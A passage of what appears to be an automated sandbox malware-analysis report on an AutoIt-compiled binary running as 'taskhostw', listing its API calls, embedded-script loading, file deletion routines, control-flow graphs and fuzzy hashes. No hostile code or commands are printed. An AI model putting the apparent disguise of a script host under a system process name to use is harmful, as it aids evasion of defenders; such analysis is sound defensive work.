                                                                  • Not Executed
                                                                  control_flow_graph 1046 1b4fe9-1b5001 CreateStreamOnHGlobal 1047 1b5003-1b501a FindResourceExW 1046->1047 1048 1b5021-1b5026 1046->1048 1049 1edc8c-1edc9b LoadResource 1047->1049 1050 1b5020 1047->1050 1049->1050 1051 1edca1-1edcaf SizeofResource 1049->1051 1050->1048 1051->1050 1052 1edcb5-1edcc0 LockResource 1051->1052 1052->1050 1053 1edcc6-1edce4 1052->1053 1053->1050
                                                                  APIs
                                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 001B4FF9
                                                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001B4EEE,?,?,00000000,00000000), ref: 001B5010
                                                                  • LoadResource.KERNEL32(?,00000000,?,?,001B4EEE,?,?,00000000,00000000,?,?,?,?,?,?,001B4F8F), ref: 001EDC90
                                                                  • SizeofResource.KERNEL32(?,00000000,?,?,001B4EEE,?,?,00000000,00000000,?,?,?,?,?,?,001B4F8F), ref: 001EDCA5
                                                                  • LockResource.KERNEL32(001B4EEE,?,?,001B4EEE,?,?,00000000,00000000,?,?,?,?,?,?,001B4F8F,00000000), ref: 001EDCB8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                  • String ID: SCRIPT
                                                                  • API String ID: 3051347437-3967369404
                                                                  • Opcode ID: 94b550dd5ecf0b5cde9a025f7fa1634f62cdb1dbb632aca26ff713c454fc1e06
                                                                  • Instruction ID: f8c780bdc2b4d21cd3953b15869a31a4975b2ffadb72e53bf1ea447fd756e6e9
                                                                  • Opcode Fuzzy Hash: 94b550dd5ecf0b5cde9a025f7fa1634f62cdb1dbb632aca26ff713c454fc1e06
                                                                  • Instruction Fuzzy Hash: A1117C75600B00BFD7219F65ED48FA77BBAEBC9B51F20416CF806C6260DB72EC008660
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: pb'$%$
                                                                  • API String ID: 3964851224-3835717432
                                                                  • Opcode ID: 670c0d96cb1e54c1ac88fe420c76192eb168f977375795ff269378f7f19cd64e
                                                                  • Instruction ID: 40d993f275beb1516e7350b24999a8d2df9c5d4ffd130229754b2251c527275b
                                                                  • Opcode Fuzzy Hash: 670c0d96cb1e54c1ac88fe420c76192eb168f977375795ff269378f7f19cd64e
                                                                  • Instruction Fuzzy Hash: 9B924470608341CFD725DF28C480B6BB7E1BBA8304F15896DE98A9B362D775EC45CB92
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Dd'$Dd'$Dd'$Dd'$Variable must be of type 'Object'.
                                                                  • API String ID: 0-1820525575
                                                                  • Opcode ID: 4934b6335afedb7dd6190d61431c88147e2d8b204acf5ed6ce50655d811009f7
                                                                  • Instruction ID: 305da9eea208faa85da220ea0314261d354a4b58ead4ed836bb013cb1cd1554e
                                                                  • Opcode Fuzzy Hash: 4934b6335afedb7dd6190d61431c88147e2d8b204acf5ed6ce50655d811009f7
                                                                  • Instruction Fuzzy Hash: 82A26A74A00219CFCB24CF58C894AEAB7F2FF58314F258069E916AB351D735ED86CB91
                                                                  APIs
                                                                  • GetFileAttributesW.KERNEL32(?,001EE6F1), ref: 002144AB
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 002144BC
                                                                  • FindClose.KERNEL32(00000000), ref: 002144CC
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                  • String ID:
                                                                  • API String ID: 48322524-0
                                                                  • Opcode ID: 2ffb3eec15e66bfe97b1762f873ace1fd6c23cf9f5fa32e25955ee395da9f38c
                                                                  • Instruction ID: 4006ef8f06476e36b5473bdacf82d833135b82f1bcd99cb237d6ffbc22a84302
                                                                  • Opcode Fuzzy Hash: 2ffb3eec15e66bfe97b1762f873ace1fd6c23cf9f5fa32e25955ee395da9f38c
                                                                  • Instruction Fuzzy Hash: 28E0D832C20402978210BB38FC0D8EA779CAE25335F100715F93DC20E0E77459608595
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001C0BBB
                                                                  • timeGetTime.WINMM ref: 001C0E76
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001C0FB3
                                                                  • Sleep.KERNEL32(0000000A), ref: 001C0FC1
                                                                  • LockWindowUpdate.USER32(00000000), ref: 001C105A
                                                                  • DestroyWindow.USER32 ref: 001C1066
                                                                  • GetMessageW.USER32 ref: 001C1080
                                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 001F51DC
                                                                  • TranslateMessage.USER32(?), ref: 001F5FB9
                                                                  • DispatchMessageW.USER32(?), ref: 001F5FC7
                                                                  • GetMessageW.USER32 ref: 001F5FDB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb'$pb'$pb'$pb'
                                                                  • API String ID: 4212290369-1124401940
                                                                  • Opcode ID: 36771116027b877511f8528b1e89dd867227fdcc5d5d47426e2948fa9f9a2512
                                                                  • Instruction ID: 23e85f707f45b1ce7a2811ee83509690657d93a752e432ffa61541e647a2a741
                                                                  • Opcode Fuzzy Hash: 36771116027b877511f8528b1e89dd867227fdcc5d5d47426e2948fa9f9a2512
                                                                  • Instruction Fuzzy Hash: EEB2C170608741DFD729DF24C885FAAB7E6BF94304F14491DF69A872A1DB70E885CB82

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00219008: __time64.LIBCMT ref: 00219012
                                                                    • Part of subcall function 001B5045: _fseek.LIBCMT ref: 001B505D
                                                                  • __wsplitpath.LIBCMT ref: 002192DD
                                                                    • Part of subcall function 001D426E: __wsplitpath_helper.LIBCMT ref: 001D42AE
                                                                  • _wcscpy.LIBCMT ref: 002192F0
                                                                  • _wcscat.LIBCMT ref: 00219303
                                                                  • __wsplitpath.LIBCMT ref: 00219328
                                                                  • _wcscat.LIBCMT ref: 0021933E
                                                                  • _wcscat.LIBCMT ref: 00219351
                                                                    • Part of subcall function 0021904E: _memmove.LIBCMT ref: 00219087
                                                                    • Part of subcall function 0021904E: _memmove.LIBCMT ref: 00219096
                                                                  • _wcscmp.LIBCMT ref: 00219298
                                                                    • Part of subcall function 002197DD: _wcscmp.LIBCMT ref: 002198CD
                                                                    • Part of subcall function 002197DD: _wcscmp.LIBCMT ref: 002198E0
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002194FB
                                                                  • _wcsncpy.LIBCMT ref: 0021956E
                                                                  • DeleteFileW.KERNEL32(?,?), ref: 002195A4
                                                                  • CopyFileW.KERNEL32 ref: 002195BA
                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002195CB
                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 002195DD
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                  • String ID:
                                                                  • API String ID: 1500180987-0
                                                                  • Opcode ID: 87f369861797b1bc0ead105e3ec6aa56ed2b1c82ded10d099c23324b5e322e96
                                                                  • Instruction ID: 2588d4c81bf45669a009949ad2fb3b40eb7482bfe00c41d1d506739b1f22bec6
                                                                  • Opcode Fuzzy Hash: 87f369861797b1bc0ead105e3ec6aa56ed2b1c82ded10d099c23324b5e322e96
                                                                  • Instruction Fuzzy Hash: 3BC15BB1D10219AACF21DF95CC85EDEBBBDEF64310F0040AAF609E7241DB709A948F61

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 001B4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,002752F8,?,001B37C0,?), ref: 001B4882
                                                                    • Part of subcall function 001D068B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,001B72C5), ref: 001D06AD
                                                                  • RegOpenKeyExW.KERNEL32 ref: 001B7308
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001EEC21
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?), ref: 001EEC62
                                                                  • RegCloseKey.ADVAPI32(?), ref: 001EECA0
                                                                  • _wcscat.LIBCMT ref: 001EECF9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                  • API String ID: 2673923337-2727554177
                                                                  • Opcode ID: be110d389cf11f84a14f5a5bb286bf0528f5564b041a059d0e01d27259d9c230
                                                                  • Instruction ID: 2ae00f0b0d24fe8da126f7c208073eabf0523be4740b3a45b3e33441ae44b269
                                                                  • Opcode Fuzzy Hash: be110d389cf11f84a14f5a5bb286bf0528f5564b041a059d0e01d27259d9c230
                                                                  • Instruction Fuzzy Hash: 647181715097019EC744EF65EC8999FBBE8FFA9340F40492EF849932B1DB319988CB51

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 756 1b3633-1b3681 758 1b3683-1b3686 756->758 759 1b36e1-1b36e3 756->759 760 1b3688-1b368f 758->760 761 1b36e7 758->761 759->758 762 1b36e5 759->762 763 1b375d-1b3765 PostQuitMessage 760->763 764 1b3695-1b369a 760->764 766 1ed24c-1ed27a call 1c11d0 call 1c11f3 761->766 767 1b36ed-1b36f0 761->767 765 1b36ca-1b36d2 DefWindowProcW 762->765 774 1b3711-1b3713 763->774 770 1ed2bf-1ed2d3 call 21281f 764->770 771 1b36a0-1b36a2 764->771 773 1b36d8-1b36de 765->773 803 1ed27f-1ed286 766->803 768 1b36f2-1b36f3 767->768 769 1b3715-1b373c SetTimer RegisterWindowMessageW 767->769 775 1ed1ef-1ed1f2 768->775 776 1b36f9-1b370c KillTimer call 1b44cb call 1b3114 768->776 769->774 777 1b373e-1b3749 CreatePopupMenu 769->777 770->774 796 1ed2d9 770->796 778 1b36a8-1b36ad 771->778 779 1b3767-1b3776 call 1b4531 771->779 774->773 782 1ed228-1ed247 MoveWindow 775->782 783 1ed1f4-1ed1f6 775->783 776->774 777->774 785 1b36b3-1b36b8 778->785 786 1ed2a4-1ed2ab 778->786 779->774 782->774 790 1ed1f8-1ed1fb 783->790 791 1ed217-1ed223 SetFocus 783->791 794 1b374b-1b375b call 1b45df 785->794 795 1b36be-1b36c4 785->795 786->765 793 1ed2b1-1ed2ba call 207f5e 786->793 790->795 799 1ed201-1ed212 call 1c11d0 790->799 791->774 793->765 794->774 795->765 795->803 796->765 799->774 803->765 807 1ed28c-1ed29f call 1b44cb call 1b43db 803->807 807->765
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 001B36D2
                                                                  • KillTimer.USER32 ref: 001B36FC
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001B371F
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001B372A
                                                                  • CreatePopupMenu.USER32 ref: 001B373E
                                                                  • PostQuitMessage.USER32(00000000), ref: 001B375F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                  • String ID: TaskbarCreated$%$
                                                                  • API String ID: 129472671-1950341607
                                                                  • Opcode ID: 7195db64bb130fb49c943a45ff994bbd1bb0af26ac5796ecc30a7f5d3749d7fd
                                                                  • Instruction ID: 8701c47b17c71baa4fb0653eb61c3df3e124589ec0fedad325e7a72849f4b5d8
                                                                  • Opcode Fuzzy Hash: 7195db64bb130fb49c943a45ff994bbd1bb0af26ac5796ecc30a7f5d3749d7fd
                                                                  • Instruction Fuzzy Hash: 474137B1610955BBDB186F78FD0DBF97755EB10300F140125FA26C62A2CFB49EB09762

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32 ref: 001B3A62
                                                                  • LoadCursorW.USER32 ref: 001B3A71
                                                                  • LoadIconW.USER32 ref: 001B3A88
                                                                  • LoadIconW.USER32 ref: 001B3A9A
                                                                  • LoadIconW.USER32 ref: 001B3AAC
                                                                  • LoadImageW.USER32 ref: 001B3AD2
                                                                  • RegisterClassExW.USER32(?), ref: 001B3B28
                                                                    • Part of subcall function 001B3041: GetSysColorBrush.USER32 ref: 001B3074
                                                                    • Part of subcall function 001B3041: RegisterClassExW.USER32(00000030), ref: 001B309E
                                                                    • Part of subcall function 001B3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001B30AF
                                                                    • Part of subcall function 001B3041: InitCommonControlsEx.COMCTL32(?), ref: 001B30CC
                                                                    • Part of subcall function 001B3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001B30DC
                                                                    • Part of subcall function 001B3041: LoadIconW.USER32 ref: 001B30F2
                                                                    • Part of subcall function 001B3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001B3101
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                  • String ID: #$0$AutoIt v3
                                                                  • API String ID: 423443420-4155596026
                                                                  • Opcode ID: e970afe620cd2b8925d3bb37cc266315a045429e01c02c4d8f26f45fb84b5502
                                                                  • Instruction ID: 627c27be04a3b9ab81c9bb2172746c9f27be9e16f45db4a881ff47430f3ee5bf
                                                                  • Opcode Fuzzy Hash: e970afe620cd2b8925d3bb37cc266315a045429e01c02c4d8f26f45fb84b5502
                                                                  • Instruction Fuzzy Hash: 10214870D11319AFEB10DFA4FD0DB9DBBB5FB08711F10052AFA08A62A2D7B556908F94

                                                                  Control-flow Graph

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R'
                                                                  • API String ID: 1825951767-819366631
                                                                  • Opcode ID: 5de01121e77276daeec31f081b6b6a078e567d1e6b5e249ca51494c5879879e0
                                                                  • Instruction ID: 89dc41ffa3c5fe1cb6f7bcd4ec90a5bf4e247797eaf0a8cf3460a91bcc93108d
                                                                  • Opcode Fuzzy Hash: 5de01121e77276daeec31f081b6b6a078e567d1e6b5e249ca51494c5879879e0
                                                                  • Instruction Fuzzy Hash: 8BA16F71C102299ADF14EFA4DC96EEEB778BF25300F44052AF426B7192DF749A09CB61

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 001D02E2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001D0313
                                                                    • Part of subcall function 001D02E2: MapVirtualKeyW.USER32(00000010,00000000), ref: 001D031B
                                                                    • Part of subcall function 001D02E2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001D0326
                                                                    • Part of subcall function 001D02E2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001D0331
                                                                    • Part of subcall function 001D02E2: MapVirtualKeyW.USER32(00000011,00000000), ref: 001D0339
                                                                    • Part of subcall function 001D02E2: MapVirtualKeyW.USER32(00000012,00000000), ref: 001D0341
                                                                    • Part of subcall function 001C6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,001BFA90), ref: 001C62B4
                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001BFB2D
                                                                  • OleInitialize.OLE32(00000000), ref: 001BFBAA
                                                                  • CloseHandle.KERNEL32(00000000), ref: 001F4921
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                  • String ID: <W'$\T'$%$$S'
                                                                  • API String ID: 1986988660-3842253252
                                                                  • Opcode ID: 092264d49e735357e0b77d9a89c781923d5fa9215dde215622b1c573a912be6e
                                                                  • Instruction ID: 29d2263303af341dca5cb2a93f7b225532bd262778438d3904a7c0caddc5645b
                                                                  • Opcode Fuzzy Hash: 092264d49e735357e0b77d9a89c781923d5fa9215dde215622b1c573a912be6e
                                                                  • Instruction Fuzzy Hash: 0281C8B0811A608ED398DF39B96D659FBE5FB983067A0856AE00DCB271EBF044C5CF10

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1056 1b39e7-1b3a57 CreateWindowExW * 2 ShowWindow * 2
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CreateShow
                                                                  • String ID: AutoIt v3$edit
                                                                  • API String ID: 1584632944-3779509399
                                                                  • Opcode ID: 8f59917c9f865f63b65aad78e07ef4ee9d0bd6af133f2dc464c9dd74d1fed5c4
                                                                  • Instruction ID: a5769360889b3771052f7a571f4a9fd075d9a8539340ca40ce7381f0830cfbbb
                                                                  • Opcode Fuzzy Hash: 8f59917c9f865f63b65aad78e07ef4ee9d0bd6af133f2dc464c9dd74d1fed5c4
                                                                  • Instruction Fuzzy Hash: E5F03A709002A07EFA3057237C0DE2BAE7DD7C6F50F00002ABE08A2271C6A10891DAB4

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1403 1b410d-1b4123 1404 1b4129-1b413e call 1b7b76 1403->1404 1405 1b4200-1b4204 1403->1405 1408 1ed50d-1ed51c LoadStringW 1404->1408 1409 1b4144-1b4164 call 1b7d2c 1404->1409 1412 1ed527-1ed53f call 1b7c8e call 1b7143 1408->1412 1409->1412 1413 1b416a-1b416e 1409->1413 1422 1b417e-1b41fb call 1d2f60 call 1b463e call 1d2f3c Shell_NotifyIconW call 1b5a64 1412->1422 1425 1ed545-1ed563 call 1b7e0b call 1b7143 call 1b7e0b 1412->1425 1415 1b4205-1b420e call 1b81a7 1413->1415 1416 1b4174-1b4179 call 1b7c8e 1413->1416 1415->1422 1416->1422 1422->1405 1425->1422
                                                                  APIs
                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001ED51C
                                                                    • Part of subcall function 001B7D2C: _memmove.LIBCMT ref: 001B7D66
                                                                  • _memset.LIBCMT ref: 001B418D
                                                                  • _wcscpy.LIBCMT ref: 001B41E1
                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001B41F1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                  • String ID: Line:
